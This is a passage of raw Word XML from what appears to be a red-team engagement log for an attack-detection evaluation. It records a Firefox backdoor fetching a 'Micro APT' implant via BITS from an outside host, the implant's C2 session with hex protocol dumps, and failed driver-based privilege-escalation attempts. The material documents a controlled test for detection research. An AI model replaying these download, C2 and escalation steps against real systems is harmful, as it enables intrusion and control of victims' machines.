      <w:bookmarkStart w:id="135" w:name="_ag62wyb3o2nx" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="136" w:name="_Toc12600073"/>
      <w:bookmarkEnd w:id="135"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>
    </w:p>
    <w:p w14:paraId="67EBBD1F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Cannot run attacks against any clearscope phones right now.  Did BBN verify the phones were usable last night when we reported having issues or only check the publishing rates?  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C33C42" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Cannot run attacks on THEIA or ClearScope this morning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EB9355" w14:textId="43309778" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="137" w:name="_rn1evxf92xcs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="138" w:name="_Toc12600074"/>
      <w:bookmarkEnd w:id="137"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>13:15 -- FiveDirections 2 -- Firefox BITS Micro APT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>
    </w:p>
    <w:p w14:paraId="357FF82D" w14:textId="6536DE0E" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Benign activity ran for most of the morning while the tools were being setup for the day.  The activity was modified so the hosts would open Firefox and browse to http://215.237.119.171/config.html.  The simulated host then entered URL for BITS Micro APT as http://68.149.51.179/ctfhost2.exe.   We used the exploited Firefox backdoor to initiate download of ctfhost2.exe via the Background Intelligent Transfer Service (BITS).  Our server indicated the file was successfully downloaded using the BITS protocol, and soon after Micro APT was executed on the target and connected out to 113.165.213.253:80 for C2.  The attacker tried to elevate using a few different drivers, but it failed once again due to the computer having been restarted without disabling driver signature enforcement.  BBN tried using BCDedit to permanently disable driver signing, but it did not seem to work during the engagement as the drivers failed to work unless driver signing was explicitly disabled during boot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09609717" w14:textId="157F928F" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="139" w:name="_uo9r4p6slrh1" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="140" w:name="_Toc12600075"/>
      <w:bookmarkEnd w:id="139"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="140"/>
    </w:p>
    <w:p w14:paraId="5990FE6F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta1-fivedirections-2</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>128.55.12.56</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Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7DC131" w14:textId="31912BAC" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="141" w:name="_5htxyu9v3xlq" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="142" w:name="_Toc12600076"/>
      <w:bookmarkEnd w:id="141"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="142"/>
    </w:p>
    <w:p w14:paraId="3569389D"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Firefox backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ADA146"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BITS protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4010C3C9"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Micro APT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3165A7AF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="143" w:name="_Toc12600077"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="143"/>
    </w:p>
    <w:p w14:paraId="23DEBFEA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33753798" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>VNC -&gt; Firefox http://215.237.119.171/config.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E295EA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Bits tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399E07BA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>http://68.149.51.179/ctfhost2.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9B3C9D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>http://68.149.51.179/asdf_doesnt_exist_asdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24714F45" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29FAC3D6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1437C44F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Click visit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A72BCD4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EC2D859" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>C2 connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F2A52C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@kududyn-ProLiant-SL170s-G6:/e5/backup/20190506/projects/micro-apt# ./c2.py 8113                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB776D4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">waiting for connection on port 8113                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5687F2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">waiting for micro apt (ctrl+c to break from loop)                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AA1C17" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">connection from (send quit to disconnect micro-apt) ('128.55.12.167', 35337)                                                         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A047BA3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x00\x00\x00\x00\x00' (8 bytes)                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190821E4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 00 00 00 00                          ........                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6808DD1A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37170DE8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 29 00 00 00 01 00 00 00 00 00 00 00 11 00 00 00  )...............                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7D407F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 11 00 00 00 00 00 00 00 6F 73 3A 0A 3D 3D 3D 0A  ........os:.===.                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021FF8FE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 77 69 6E 2D 78 36 34 0A 00                       win-x64..                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9FEC3C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">')\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00os:\n===\nwin-x64\n\x00'               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553689F9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">os:                                                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2857ED93" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">===                                                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5041EB41" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">win-x64            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEB0810" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52A1136C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0872E643" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;aptinfo                                                                                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF84B84" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x00\x00\x00\x00\x00' (8 bytes)                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6275E31D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 00 00 00 00                          ........                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F96B968" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3453BDDF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 29 00 00 00 01 00 00 00 00 00 00 00 11 00 00 00  )...............                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA7EDDB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 11 00 00 00 00 00 00 00 6F 73 3A 0A 3D 3D 3D 0A  ........os:.===.                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445C95DE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 77 69 6E 2D 78 36 34 0A 00                       win-x64..                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEE3F0A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: os:                                                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F530DD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">===                                                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6033AD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">win-x64    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAB3FD2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ABC628A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781CF65C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;elevate \\.\sysmon                                                                                                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A242A66" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '$\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x0b\x00\x00\x001\\\\.\\sysmon\x00' (36 bytes)   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287B5203" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 24 00 00 00 20 00 00 00 00 00 00 00 01 00 00 00  $... ...........                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E061775" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 01 00 00 00 0B 00 00 00 31 5C 5C 2E 5C 73 79 73  ........1\\.\sys                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABE993A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 6D 6F 6E 00                                      mon.                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0928FA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5375CFAB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1C 00 00 00 21 00 00 00 00 00 00 00 04 00 00 00  ....!...........                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ACAC95" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 04 00 00 00 00 00 00 00 FF FF FF FF              ............                                                              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2065CBB0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: 4294967295    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C43E691" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53F13B64" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688048C3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;whoami                                                                                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C744E16" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sending: '\x08\x00\x00\x00\x16\x00\x00\x00' (8 bytes)                                                                                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E47563" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 08 00 00 00 16 00 00 00                          ........                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B78372C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE97585" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1E 00 00 00 17 00 00 00 00 00 00 00 06 00 00 00  ................                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504E1D52" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 06 00 00 00 00 00 00 00 61 64 6D 69 6E 00        ........admin.                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC7C0DB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">apt returned: admin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3E8B3F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3370A2C4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">APT&gt;elevate \\\\.\\sysmon                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0320F97F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: "'\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x0e\x00\x00\x001\\\\\\\\.\\\\sysmon\x00" (39 byt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23102AC5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">es)                                                                                                                                  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4592CC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 27 00 00 00 20 00 00 00 00 00 00 00 01 00 00 00  '... ...........                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1D74AE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000010: 01 00 00 00 0E 00 00 00 31 5C 5C 5C 5C 2E 5C 5C  ........1\\\\.\\                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B11DF26" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000020: 73 79 73 6D 6F 6E 00                             sysmon.                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AA8787" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">received:                                                                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041E0DE7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000000: 1C 00 00 00 21 00 00 00 00 00 00 00 04 00 00 00  ....!...........                                                          </w:t>
      </w:r>
    </w:p>
